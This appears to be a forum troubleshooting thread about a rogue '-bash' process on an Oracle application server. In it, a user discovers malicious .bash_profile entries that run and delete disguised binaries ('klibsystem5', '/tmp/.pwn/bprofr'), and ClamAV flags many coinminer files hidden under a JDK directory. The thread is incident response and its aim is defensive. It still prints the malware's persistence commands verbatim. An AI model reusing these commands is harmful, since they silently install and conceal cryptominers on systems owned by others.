Auto Generating -bash process

Check /var/log/messages and dmesg outputs as well.. Any errors there?

This bash process run from the "/" directory. What do you have there? Any scripts? Send me the ls -al output from "/" directory.

You can also enable debug for all the bash processes in the system.. But this is a little risky. and you have to know what are doing..

[appsdev@test ~]$ cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)


I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r --  /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c  -p 80 -p 8080 -p 443 -tls  -dp 80 -dp 8080 -dp 443 -tls  -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

[root@test log]# cd /
[root@test /]# ls -la
total 80
dr-xr-xr-x.  20 root root  4096 Mar 23 12:35 .
dr-xr-xr-x.  20 root root  4096 Mar 23 12:35 ..
lrwxrwxrwx.   1 root root     7 Sep 13  2023 bin -> usr/bin
dr-xr-xr-x.   5 root root  4096 Apr 18 15:42 boot
drwxr-xr-x.   7 root root  4096 May  1 14:40 data
drwxr-xr-x.  21 root root  3680 Mar 23 12:35 dev
drwxr-xr-x. 187 root root 12288 May  9 12:21 etc
drwxr-xr-x.   7 root root    78 Apr 25 11:51 home
lrwxrwxrwx.   1 root root     7 Sep 13  2023 lib -> usr/lib
lrwxrwxrwx.   1 root root     9 Sep 13  2023 lib64 -> usr/lib64
drwxr-xr-x.   2 root root     6 Apr 11  2018 media
drwxr-xr-x.   7 root root    78 Sep 14  2023 mnt
drwxrwxrwx.   6 1005 dba    102 Apr 24 05:56 opt
dr-xr-xr-x. 642 root root     0 Mar 23 18:04 proc
-rw-r--r--.   1 root root 14475 Mar 23 12:35 .readahead
dr-xr-x---+  24 root root  4096 Apr 24 18:11 root
drwxr-xr-x.  58 root root  1600 May 10 07:21 run
lrwxrwxrwx.   1 root root     8 Sep 13  2023 sbin -> usr/sbin
drwxr-xr-x.   2 root root     6 Apr 11  2018 srv
dr-xr-xr-x.  13 root root     0 Mar 23 12:34 sys
drwxr-xr-x.   2 root root     6 Sep 13  2023 TEST
drwxrwxrwt.  21 root root  8192 May 10 10:23 tmp
drwxr-xr-x.  11 root root  4096 May  1 13:06 u01
drwxr-xr-x.  14 root root  4096 Jan 19 17:15 usr
drwxr-xr-x.  24 root root  4096 Apr 30 11:55 var
[root@test /]#

Okay.. Well...

---
cp -f -r --  /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c  -p 80 -p 8080 -p 443 -tls  -dp 80 -dp 8080 -dp 443 -tls  -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null
----

the first command ->  copies a system file (klibsystem5), potentially executes it (with unknown effects),
hides any errors, and then deletes the original file. This is highly likely to damage your system.

the second command ->  copies a potentially malicious program (.pwn/bprofr) from the temporary directory, renames it to a hidden file (-bash) that looks like the standard bash shell program, tries to run it with port forwarding options, hides any output, and then deletes the copied program.  This executes a bash!! --THIS MAY BE THE CAUSE!

so these may cause the problem.. Speak with your OS admin about these.. Comment them if it is okay (they seem like malware(s), kill that problematic bash, and see whether or not this fixes your issue.

Byheway, I know checked, and I can tell that, these are malwares.. You have malware(s) in your system.. (klibsystem5 & bprofr )

Get rid of them as soon as possible..!

How can i  remove this malware(s)? plz suggest.

Actualy, we are using custom application(orace forms and report). I'am facing this issue on evey machine on which application is running.I have commented both the commands in .bash_profile but i think i ve done this before many times. Entry mades automatically. Before this, there were the same entry in crontab. thus, ive disabled the cronjobs for the appsdev which is owning the application files.

You must remove it..
Either you must remove it yourself manually. (by discovering its source files and delete all of them one by one..) or you must remove it using a Linux virus scanner. ("clamav" is an example for such tool , it is an easy to use tool) -- https://oracle-base.com/articles/linux/linux-antivirus-clamav

But you should be very carefuly, not to delete any of the system files, or EBS-related file.

Migrating your affected applications / databases to a new server is also an option, and it might be a better option in the case you can't be sure about the removal of whole of that malware. But if you migrate, there is a risk that you migrate the malware too. So a careful and delicate work is required.. (for all the options)

Output is like this----Should i remove these files.... I think these files has no use on the system
[root@test bin]# clamscan -i -v -r / |grep FOUND


/u01/appsxe/jdk8/jre/lib/desktop/icons/HighContrast/iujk7j: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/icons/HighContrast/cxonss: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/icons/fa2lko: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/93303s: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/wwvy01: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/2i504p: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/klfzcn: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/eke6us: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/lfti2a: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/9thprh: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/znw6pc: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/2e2nvf: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/desktop/applications/mtk0kj: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/08z5gx: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/pfkske: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/64n9j7: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/jli/u48k6b: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/jli/p8f5bj: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/jli/c9yq11: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/tox7j9: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/server/9ijyd6: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/server/b9cyxi: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/server/rouo34: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/server/jgzr41: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/w1mcoe: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/amd64/nqj4lb: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/deploy/j3k3re: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/deploy/fvodrz: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/deploy/5d1o8m: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/deploy/83gdgj: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/deploy/x39gkg: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/cv7hs8: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/mjoncr: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/hwww69: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/bcpu36: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/6yhh87: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/mq013g: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/x4xqyb: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/applet/d540mr: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/7l17ub: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/lib/ru9cza: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/0xjyv3: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bv4jyp: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/4wk62q: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/ppheq9: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/0j1bto: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/javafx/3a2wcg: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/javafx/aohoqi: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/javafx/6eri4z: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/javafx/hzhhwk: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/h8flzp: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/zkoj8n: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/459gvd: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/ojh7js: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/heqs3n: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/shgnxj: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/jdk/px2leo: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/r3lp94: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/legal/ctg5yr: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/ciq3ej: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/uv0zah: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/fbq5p0: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/30g1dk: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/53omj8: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/bin/6xcoqb: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/cp4r7v: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/jre/6qqjf2: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/bin/3fev1o_temp: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/bin/ko89h3_temp: Multios.Coinminer.Miner-6781728-2 FOUND
/u01/appsxe/jdk8/bin/1vjx1m_temp: Multios.Coinminer.Miner-6781728-2 FOUND
[root@test bin]#

There are findings as you see Work with your security and OS administrators after this point.